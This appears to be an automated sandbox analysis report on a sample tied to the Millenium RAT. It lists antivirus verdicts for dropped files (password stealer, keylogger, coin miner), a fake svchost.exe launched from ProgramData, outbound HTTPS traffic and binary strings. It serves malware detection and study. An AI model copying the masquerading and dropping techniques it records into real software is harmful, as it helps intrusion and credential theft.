                                  Source: Process startedAuthor: vburov: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe, ParentProcessId: 7924, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 4944, ProcessName: svchost.exe
                                  Timestamp:06/05/24-03:56:42.216265
                                  SID:2036289
                                  Source Port:61625
                                  Destination Port:53
                                  Protocol:UDP
                                  Classtype:A Network Trojan was detected

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: http://pesterbdd.com/images/Pester.pngSophos S4: Label: malware repository domain
                                  Source: C:\ProgramData\Microsoft\hacn.exeAvira: detection malicious, Label: TR/Drop.Agent.flqmj
                                  Source: C:\ProgramData\setup.exeAvira: detection malicious, Label: TR/CoinMiner.lnxah
                                  Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: TR/CoinMiner.lnxah
                                  Source: C:\ProgramData\main.exeAvira: detection malicious, Label: TR/Spy.KeyLogger.kapbl
                                  Source: C:\ProgramData\svchost.exeAvira: detection malicious, Label: TR/PSW.Agent.lninx
                                  Source: C:\ProgramData\Microsoft\based.exeAvira: detection malicious, Label: HEUR/AGEN.1351111
                                  Source: http://pesterbdd.com/images/Pester.pngVirustotal: Detection: 10%Perma Link
                                  Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 87%
                                  Source: C:\ProgramData\Microsoft\based.exeReversingLabs: Detection: 51%
                                  Source: C:\ProgramData\Microsoft\hacn.exeReversingLabs: Detection: 66%
                                  Source: C:\ProgramData\main.exeReversingLabs: Detection: 83%
                                  Source: C:\ProgramData\setup.exeReversingLabs: Detection: 87%
                                  Source: C:\ProgramData\svchost.exeReversingLabs: Detection: 73%
                                  Source: TS-240605-Millenium1.exeReversingLabs: Detection: 27%
                                  Source: TS-240605-Millenium1.exeVirustotal: Detection: 36%Perma Link
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                                  Source: C:\ProgramData\Microsoft\hacn.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\setup.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\main.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\svchost.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\Microsoft\based.exeJoe Sandbox ML: detected

                                  Bitcoin Miner

                                  barindex
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED
                                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49746 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49753 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49768 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49771 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49787 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49817 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49818 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49823 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49824 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49829 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49830 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49835 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49836 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49841 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49842 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49847 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49848 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49850 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49851 version: TLS 1.2
                                  Source: TS-240605-Millenium1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942062017.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942989444.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1923662951.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000016.00000003.1929815349.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1931767954.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927279052.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed source: main.exe, 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1931767954.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1946788704.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: based.exe, 00000008.00000002.2129872037.00007FFDFAAD9000.00000040.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1941897050.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: TS-240605-Millenium1.exe, 00000000.00000003.1829021959.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp, based.exe, 00000007.00000003.1867875346.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2142359047.00007FFE1A463000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1930503874.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1939751202.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1930503874.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1941061494.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942214372.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000008.00000002.2140810158.00007FFE13261000.00000040.00000001.01000000.00000010.sdmp
                                  Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000006.00000003.1866460732.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1907228986.00007FFE13311000.00000002.00000001.01000000.00000013.sdmp
                                  Source: Binary string: C:\Users\attat\source\repos\Millenium RAT Buillder V2.8\Millenium\Millenium\obj\Release\net462\conhost.pdb source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2141209052.00007FFE13301000.00000040.00000001.01000000.0000001E.sdmp, svchost.exe, 00000016.00000003.1923356570.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927958538.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1934617102.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1934617102.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1926847028.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1947109622.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1929590309.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1934097832.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1939007934.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: svchost.exe, 00000016.00000003.1938211991.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942410950.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1939751202.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2140120247.00007FFE11EBC000.00000040.00000001.01000000.00000015.sdmp, svchost.exe, 00000016.00000003.1923662951.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927014509.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2139839021.00007FFE11511000.00000040.00000001.01000000.00000016.sdmp, svchost.exe, 00000016.00000003.1920172222.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927958538.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1935509292.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2139424502.00007FFE10301000.00000040.00000001.01000000.00000019.sdmp
                                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1929590309.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1946788704.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1941061494.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1947109622.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 00000005.00000000.1842954166.0000000000396000.00000002.00000001.01000000.00000007.sdmp, Build.exe, 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmp, s.exe, 0000000C.00000002.1929749777.0000000000D13000.00000002.00000001.01000000.00000014.sdmp, s.exe, 0000000C.00000000.1890528447.0000000000D13000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2134327409.00007FFDFBAC0000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 00000016.00000003.1963958439.000002C3F5832000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: based.exe, 00000008.00000002.2129872037.00007FFDFAB71000.00000040.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: based.exe, 00000008.00000002.2137558702.00007FFE007E4000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000016.00000003.1938211991.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1934097832.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: svchost.exe, 00000016.00000003.1929815349.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1935509292.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927014509.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: TS-240605-Millenium1.exe, 00000000.00000003.1829021959.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp, based.exe, 00000007.00000003.1867875346.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2142359047.00007FFE1A463000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp
                                  Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: based.exe, based.exe, 00000008.00000002.2129872037.00007FFDFAB71000.00000040.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942214372.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1930774144.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1946961098.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000016.00000003.1935382253.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB16B000.00000040.00000001.01000000.00000005.sdmp, based.exe, 00000008.00000002.2132559008.00007FFDFB16B000.00000040.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927279052.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942062017.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1931053908.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2140577670.00007FFE13201000.00000040.00000001.01000000.0000001A.sdmp
                                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1933749941.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1935780231.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1939007934.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000016.00000003.1930006938.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1926847028.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: based.exe
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: based.exe, 00000008.00000002.2140120247.00007FFE11EBC000.00000040.00000001.01000000.00000015.sdmp
                                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942410950.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1931053908.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB80B9000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000009.00000002.1905399144.00007FFDFB9AF000.00000002.00000001.01000000.00000012.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: based.exe, 00000008.00000002.2140404120.00007FFE130C1000.00000040.00000001.01000000.0000001F.sdmp
                                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1933749941.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1930774144.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942989444.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000008.00000002.2138737753.00007FFE0EB41000.00000040.00000001.01000000.00000017.sdmp
                                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1935780231.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: svchost.exe, 00000016.00000003.1935382253.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: svchost.exe, 00000016.00000003.1958528101.000002C3F582E000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\libssl-3.pdb source: based.exe, based.exe, 00000008.00000002.2137558702.00007FFE007E4000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1941897050.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: based.exe, based.exe, 00000008.00000002.2138314903.00007FFE0E151000.00000040.00000001.01000000.0000001B.sdmp
                                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1946961098.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6CEB38670
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB28D00 FindFirstFileExW,FindClose,0_2_00007FF6CEB28D00
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6CEB38670
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB426C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6CEB426C4
